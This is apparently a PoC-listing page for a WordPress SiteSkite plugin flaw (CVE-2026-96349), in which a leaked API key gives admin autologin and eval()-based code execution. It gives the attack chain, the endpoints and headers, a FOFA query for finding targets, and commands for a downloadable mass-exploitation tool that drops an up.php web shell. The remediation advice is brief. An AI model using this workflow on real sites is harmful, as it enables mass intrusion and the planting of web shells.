CVE-2026-96349 — WordPress SiteSkite ≤2.1.8 API-Key Autologin + MCP eval() RCE Chain
October 1, 2026 · 76 views
SiteSkite WordPress plugin ≤2.1.8: long-lived API key acts as unauthenticated admin bearer via ?token= autologin; REST/admin-ajax MCP abilities run siteskite_execute_php (eval) and file write. CVSS 10.0 Critical (CWE-94). Fixed in 2.2.0. Python PoC: check (readme ≤2.1.8), exploit with API key, mass hits/exploited, --lab. Marker POCBIT-96349-OK.
Description
Overview
CVE-2026-96349 — SiteSkite WordPress plugin — unauthenticated remote code execution when the plugin’s API key is known (Patchstack / CVE Program; CVSS 10.0 Critical, CWE-94).
| | | |---|---| | Product | SiteSkite | | Affected | ≤ 2.1.8 | | Fixed | ≥ 2.2.0 (September 2026) | | Verify marker | POCBIT-96349-OK |
In ≤ 2.1.8, the stored siteskite_api_key doubles as an unauthenticated admin login bearer (?token= on /siteskite-autologin or front-end URLs). With the key, attackers call POST /wp-json/siteskite/v1/abilities/execute (or admin-ajax.php?action=siteskite_api) with X-SiteSkite-Key and run siteskite_execute_php (eval) or siteskite_write_file. 2.2.0 removes raw-key autologin (portal HMAC links only).
PoC page: https://pocbit.org/pocs/cve-2026-96349
GitHub: murrez/CVE-2026-96349
CVE.org: CVE-2026-96349
Patchstack: SiteSkite 2.1.8 RCE advisory
Attack chain (summary)
- Obtain victim SiteSkite API key (portal links, leaks, backups,
url\tkeylists — exploit mode requires a key unless per-URL key is supplied). - Optional: prove session via
/?token=KEYor/siteskite-autologin?token=KEY. siteskite_execute_php→ marker, or write_file / up.php drop under uploads.
Bundled tool (Python 3.10+)
Download cve-2026-96349.py — bundle extractor (poc.py, _engine.py, up.php).
pip install requests colorama
python cve-2026-96349.py
python poc.py --lab
python poc.py --check fofa_targets.txt
python poc.py fofa_targets.txt --key YOUR_SITESKITE_API_KEY
python poc.py urls.txt -t 24
python poc.py -u https://target.example --check
python poc.py -u https://target.example --key SITE_SKITE_KEY
Per-target keys in list files: https://site.example<TAB>api_key or pipe-separated. Env: SITESKITE_API_KEY / SITESKITE_KEY.
| Mode | Output |
|------|--------|
| check | hits.txt — readme ≤2.1.8, autologin fingerprint |
| exploit | exploited.txt — RCE verified with marker |
Discovery hints
body="/wp-content/plugins/siteskite/"
Check mode does not brute-force API keys.
Remediation
- Upgrade SiteSkite to ≥ 2.2.0 immediately.
- Rotate API key after upgrade (old key was a login bearer).
- Disable unused MCP / advanced tools; audit
?token=andX-SiteSkite-Keyin logs.
See also WordPress plugin vulnerabilities guide.
Legal and ethical use
Authorized security testing only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- WordPressCVE-2026-14281critical
CVE-2026-14281 — WAWP WordPress Unauthenticated Privilege Escalation (≤ 4.8.6)
Unauthenticated administrator via public WAWP REST signup: unsanitized wawp_custom_fields writes wp_capabilities through update_user_meta. Automation Web Platform plugin ≤ 4.8.6 (CVSS 3.1 9.8 Critical).
- WordPressCVE-2026-85984critical
CVE-2026-85984 — WordPress miniOrange OTP Unauthenticated Admin Bypass
Unauthenticated authentication bypass (CWE-287) in miniOrange OTP Login, Verification and SMS Notifications ≤ 5.5.5 via wp-login.php POST mo_wp_login_intent=otp with empty password — mo_by_pass_login() skip_pass_fallback skips password check when Admin OTP Bypass and related OTP login options are enabled. CVSS 3.1 9.8 Critical. Fixed in 5.5.6+. PoC: plugin scan, optional user enum, check/exploit modes.
- WordPressCVE-2026-18143critical
CVE-2026-18143 — Addify Request a Quote for WooCommerce Unauthenticated File Upload
Unauthenticated arbitrary file upload (CWE-434, CVSS 9.8 Critical) in Request a Quote for WooCommerce ≤ 2.9.2 via public AJAX afrfq_submit_quote_via_popup — unsafe move_uploaded_file() with attacker-controlled .php names into web-accessible RFQ temp storage. Requires popup quote rule on the storefront.
- JoomlaCVE-2026-102425critical
CVE-2026-102425 — Joomla Balbooa Forms (com_baforms) Field Shortcode → Unauthenticated RCE
Balbooa Forms for Joomla 1.0.0–2.4.3.3: when a public form runs PHP-after-submission via eval(), field shortcodes are replaced with raw visitor input inside double-quoted PHP — classic ";breakout;// → RCE. CVSS 4.0 9.5 Critical (AT:P). Fixed in 2.4.3.4. Not CVE-2026-67364. Python PoC: version + public form detect, check/exploit, up.php drop, interactive + mass -j.